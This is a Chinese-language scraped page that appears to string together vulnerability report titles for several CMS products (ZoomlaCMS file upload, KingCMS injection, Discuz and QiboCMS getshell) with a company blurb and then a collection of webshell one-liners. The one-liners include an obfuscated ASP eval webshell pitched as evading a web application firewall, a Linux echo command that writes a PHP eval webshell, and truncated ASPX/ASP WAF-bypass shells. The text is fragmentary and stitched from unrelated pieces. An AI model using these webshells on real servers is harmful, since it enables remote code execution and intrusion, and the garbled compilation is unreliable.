逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤
1
asp_code.dll
class ZoomlaSecurityCenter

某高大上的CMS存在任意文件上传漏洞(涉及金融、百强企业、上市公司、控股集团等)

详细说明:

BOC是杭州博采网络科技股份有限公司的高端网站建设品牌,是知名的杭州网络公司。

博采网络成立于2004年。我们致力于为全球精英企业提供创新、尖端、前沿的数字化营销服务。十年来始终坚守”全网价值营销服务商”的服务定位,与全球逾3000家企业建立了长期深入、互惠互信的战略合作关系,其中包括阿里巴巴、松下、吉利、华润、保利、万科、传化等知名企业。

06205105f80ae4fa0a62d04430d009cd6fcc51c5[1]

KingCms最新版绕过补丁(版本:9.00.0019)注入6枚

详细说明:

朋友的公司购买了kingcms的授权,最近kingcms官方给我朋友发来了升级包,升级说明当中说已经解决了已知的安全问题,今天再帮朋友测试下。

自从朋友购买,已经经过了9.00.0015,9.00.0016,9.00.0017,现在更新到了9.00.0018,在线升级的话可以升级到9.00.0019了,kingcms服务还不错。9.00.0018的更新时间是2015.07.23,9.00.0019的更新应该是最近几天的事情。见官网http://www.kingcms.com/download/k9/


discuz某插件设计缺陷可前台getshell

1

qibocms(齐博) 分类系统最新版 前台无限制Getshell

1

另类姿势GetShell php大马

过安全狗asp一句话

过安全狗asp一句话

-5kik <%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("5kik")%>

dos命令下写webshell语句

linux:echo -e “<[email protected](\\$_POST[“c”]);?>” > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c

过各种waf墙aspx一句话

过各种waf墙aspx一句话

<script runat="server" language="JScript">
function exs(str) {
	var q = "u";
	var w = "afe";

过各种waf墙asp一句话

过各种waf墙asp一句话

<%
Function Writesource(str)
	Response.write(str)
End Function
Function cd(ByVal s, ByVal key)
    For i = 1 To